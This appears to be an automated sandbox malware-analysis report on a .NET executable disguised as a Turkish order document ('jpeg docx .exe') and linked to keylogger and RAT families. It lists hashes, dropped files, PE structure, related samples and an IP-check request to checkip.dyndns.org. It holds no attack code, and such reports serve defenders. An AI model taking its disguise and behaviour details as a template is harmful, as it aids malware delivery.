                                          Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          checkip.dyndns.comCTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                          • 132.226.8.169
                                          Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 132.226.247.73
                                          Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                          • 193.122.6.168
                                          December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                          • 193.122.6.168
                                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                          • 132.226.247.73
                                          PO.exeGet hashmaliciousMassLogger RATBrowse
                                          • 193.122.6.168
                                          BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 158.101.44.242
                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                          • 132.226.8.169
                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 132.226.8.169
                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 132.226.247.73
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          UTMEMUSCTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                          • 132.226.8.169
                                          Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 132.226.247.73
                                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                          • 132.226.247.73
                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                          • 132.226.8.169
                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 132.226.8.169
                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 132.226.247.73
                                          fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                          • 132.226.247.73
                                          Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                          • 132.226.247.73
                                          miori.ppc.elfGet hashmaliciousUnknownBrowse
                                          • 132.224.247.83
                                          ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 132.226.8.169
                                          No context
                                          No context
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):1.139370676300173
                                          Encrypted:false
                                          SSDEEP:192:b+obXbgT0BU/Ca6ce36izuiFcHZ24IO8dt:KobXbgABU/CarVizuiFcHY4IO8d
                                          MD5:AFC4EED7060D215AD37572FE6488ECCF
                                          SHA1:8C4055E9C6DB706A7D8120F2324A119880AC983A
                                          SHA-256:3643C48BE6E5644D79DCEE0893B65B21E00490AE43E49F969E821C15F1A8744F
                                          SHA-512:9F8E40EA8F42C61E0A2E7952B65C34C16E6FBBC157C039A466A332318AE357C631FCB02513DDC81CC56CB63F46E00C0D1C93C7348D2487CE2C0EE2F03AFB0DEC
                                          Malicious:false
                                          Reputation:low
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.9.1.0.8.1.9.3.5.1.0.4.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.9.1.0.8.1.9.8.8.2.2.8.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.e.b.8.f.7.a.-.e.2.7.7.-.4.a.2.c.-.a.d.0.c.-.1.1.1.5.1.d.4.b.8.8.1.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.e.3.a.1.e.0.-.e.b.b.e.-.4.5.5.9.-.a.4.f.0.-.9.f.0.2.0.8.9.c.0.6.0.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.y.a.t.i._.t.e.k.l.i.f. .6.1.5.T.B.I.5.0.7._. .A.C.C.A.D.O. .s.a.n. .t.i.c._. .S.i.p.a.r.i.#.U.0.1.5.f.i. .j.p.e.g. .d.o.c.x.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.Q.b.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.1.0.-.0.0.0.1.-.0.0.1.4.-.a.9.a.6.-.5.8.b.f.a.c.6.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.2.f.4.2.f.d.2.9.0.0.1.1.2.e.0.b.4.d.0.5.c.e.d.c.3.4.7.e.7.7.0.0.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 15 streams, Thu Jan 9 15:40:19 2025, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):274552
                                          Entropy (8bit):3.703449988822458
                                          Encrypted:false
                                          SSDEEP:3072:BAK6Llhpt4uEqpEg5LTgS0yVT3639Nd1CYnBEYM/od:aKslhpt4IFTgS0yVTK72K
                                          MD5:26A63B9EF25C68D4AD3334A4C58F3EAE
                                          SHA1:4B0E7FE0952A660179948F0A76CFBDD8D33055AA
                                          SHA-256:0D3480067F5070FA97B4CBFC054B80D1B7BE79E657D821B5BC86A5496DD97E15
                                          SHA-512:F114190BB13590850A3CBFD13E6CEBE1BC43F463C48C6A2ECE1F28DF120009707FC63F15E60AE9F3B9DCBD5BB5FA0F237378D8F7CFB6F59BEAB3C33007DB3956
                                          Malicious:false
                                          Reputation:low
                                          Preview:MDMP..a..... ..........g............D...............X.......<....#......t%...T..........`.......8...........T............;..............,$...........&..............................................................................eJ.......&......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):6530
                                          Entropy (8bit):3.743438661463887
                                          Encrypted:false
                                          SSDEEP:96:RSIU6o7wVetbg26XozY64xuQE/Ge0t5aM4U089bfKsfbU1m:R6l7wVeJg268Y640kpr089bfKsfbU1m
                                          MD5:5E1C9B64DCC53B24AC0F4421394BF171
                                          SHA1:38BED4B9633EDA5835C450B91BA7DCFA8A5886AB
                                          SHA-256:40F24BA1E7CED0F2FA38B93026E1EFAF1345E2BE0DF68C6220A49F83B59DF6B2
                                          SHA-512:C707FB21E3D8B3FE692ED4445291B586987841418A47F4533EFA33175B9837A3647B6615BE4AA5E5CF6C89FE38BD1F950845E2E8D0A3A179353D7DE726EE1869
                                          Malicious:false
                                          Reputation:low
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.9.6.<./.P.i.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4914
                                          Entropy (8bit):4.58796773204682
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zseJg77aI9AzWpW8VYrYm8M4J+xIxtjFP+q8Lxk2pk20x3tpx33d:uIjfUI7iC7VXJ+xIx3uxTpk20x3Dx33d
                                          MD5:8DD45D45749ACCF1FD81D5B60BF098CE
                                          SHA1:3FBCB49BDB88FBE845C06235B25112F4A56DB993
                                          SHA-256:2BAE8534645D8E59FCCF323FEA59978332E7D7A31571B4D30523E63E3BAD0794
                                          SHA-512:34B014638E7BE68FCACC4EB8E316C90ABF376004E408B9D15F8A5D2101796DD8E6778624845228F3103C88142874F270AF7C492FC641A554E76C274FCF12E48E
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="668563" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                          Process:C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:8B21C0FDF91680677FEFC8890882FD1F
                                          SHA1:E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
                                          SHA-256:E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
                                          SHA-512:1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1172
                                          Entropy (8bit):5.354777075714867
                                          Encrypted:false
                                          SSDEEP:24:3gWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:QWSU4xympjms4RIoU99tK8NDv
                                          MD5:F614CCA1D985910D63FFFF70966F53F5
                                          SHA1:A9BD00A65E13088BD96A2420E289487CD07D9D4C
                                          SHA-256:3714147C391F57DCDB11C8D0E7076367B3BD1D628A5FB73E2BEE67B99F034157
                                          SHA-512:AE362137DA68C2853EB39BC2EC5A6AD2361689225F28337F0738617D6DB986E4BCF985FE12E910405E621CE407B4E6AF3308ADDDE4F9D81E02F2ED8E27831CAE
                                          Malicious:false
                                          Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.372667601340581
                                          Encrypted:false
                                          SSDEEP:6144:xFVfpi6ceLP/9skLmb0GyWWSPtaJG8nAge35OlMMhA2AX4WABlguNTiL:3V1gyWWI/glMM6kF75q
                                          MD5:67F5846CECBB7EA2D171B9BD5064048C
                                          SHA1:E0C41EAA846A5ABC08E9A8EB8A5357D080AC33B9
                                          SHA-256:2C2605F5C850A9B426100FAD9444319C82CE32C665507734D60C533507DC0769
                                          SHA-512:CC21931368674CC23F363A6E30B19C69217426670785757BEDBA4CED4CC2AC30F3DE1E9091517821EB30E1AF882B7278CAB607BD00036226926160C1EC9A6433
                                          Malicious:false
                                          Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....b..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.557333673165223
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                                          File size:894'976 bytes
                                          MD5:3e9b50da2409b41170a088fc4bb0e5f1
                                          SHA1:7cbeabc06f45357344cdc6c876a1ecdb90b685da
                                          SHA256:6964e678bccc61457b0d3f3ea6264d7c1e92d33802fffbb59f2f3c15f9dc5656
                                          SHA512:91a2bc914c3b798c88c9af73e38ea76e1321ecb273778e46af3d9a2ef24b626f3b40c1247b286383febe5044773f8113ef706cbed2262c831043b10b820fcf72
                                          SSDEEP:12288:fFCuDcWYMV+I4MVKWkUcfiuQ0PBgyxJbDfkDfbZtgpktca+ewex9VlVQn1Zrpj:FYGRgxxpWcJbsZqU+e/7VlVE
                                          TLSH:D7159C092352E4CDD0D749BC54A3FFB791011D494622C2C247EEB9AB7AAB98E790F1C7
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%}g..............0.................. ........@.. ....................................`................................
                                          Icon Hash:46992606071d1a94
                                          Entrypoint:0x4da8be
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x677D2588 [Tue Jan 7 13:00:56 2025 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xda86c0x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xdc0000x19c0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xd88c40xd8a005328f04dd985e4fa2a3d416701abcf68False0.8161222410559723data7.568644152152716IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xdc0000x19c00x1a002adfa802a5e51abdafad9210f8116601False0.2737379807692308data3.9083455018494364IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xde0000xc0x2009dd0bf0ed9feac27c7076e07c56c9993False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0xdc1480x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.3953900709219858
                                          RT_ICON0xdc5b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.21693245778611633
                                          RT_GROUP_ICON0xdd6580x22data0.9411764705882353
                                          RT_GROUP_ICON0xdd67c0x22data0.9411764705882353
                                          RT_VERSION0xdd6a00x31cdata0.4321608040201005
                                          DLLImport
                                          mscoree.dll_CorExeMain
                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 9, 2025 16:40:03.778392076 CET4970880192.168.2.8132.226.8.169
                                          Jan 9, 2025 16:40:03.783426046 CET8049708132.226.8.169192.168.2.8
                                          Jan 9, 2025 16:40:03.783508062 CET4970880192.168.2.8132.226.8.169
                                          Jan 9, 2025 16:40:03.783703089 CET4970880192.168.2.8132.226.8.169
                                          Jan 9, 2025 16:40:03.788558006 CET8049708132.226.8.169192.168.2.8
                                          Jan 9, 2025 16:40:19.374141932 CET8049708132.226.8.169192.168.2.8
                                          Jan 9, 2025 16:40:19.421976089 CET4970880192.168.2.8132.226.8.169
                                          Jan 9, 2025 16:40:24.983536005 CET4970880192.168.2.8132.226.8.169
                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 9, 2025 16:40:03.758990049 CET5593653192.168.2.81.1.1.1
                                          Jan 9, 2025 16:40:03.766453028 CET53559361.1.1.1192.168.2.8
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jan 9, 2025 16:40:03.758990049 CET192.168.2.81.1.1.10xf90aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jan 9, 2025 16:40:03.766453028 CET1.1.1.1192.168.2.80xf90aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 9, 2025 16:40:03.766453028 CET1.1.1.1192.168.2.80xf90aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                          Jan 9, 2025 16:40:03.766453028 CET1.1.1.1192.168.2.80xf90aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                          Jan 9, 2025 16:40:03.766453028 CET1.1.1.1192.168.2.80xf90aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                          Jan 9, 2025 16:40:03.766453028 CET1.1.1.1192.168.2.80xf90aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                          Jan 9, 2025 16:40:03.766453028 CET1.1.1.1192.168.2.80xf90aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                          • checkip.dyndns.org
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.849708132.226.8.169807696C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                                          TimestampBytes transferredDirectionData
                                          Jan 9, 2025 16:40:03.783703089 CET151OUTGET / HTTP/1.1
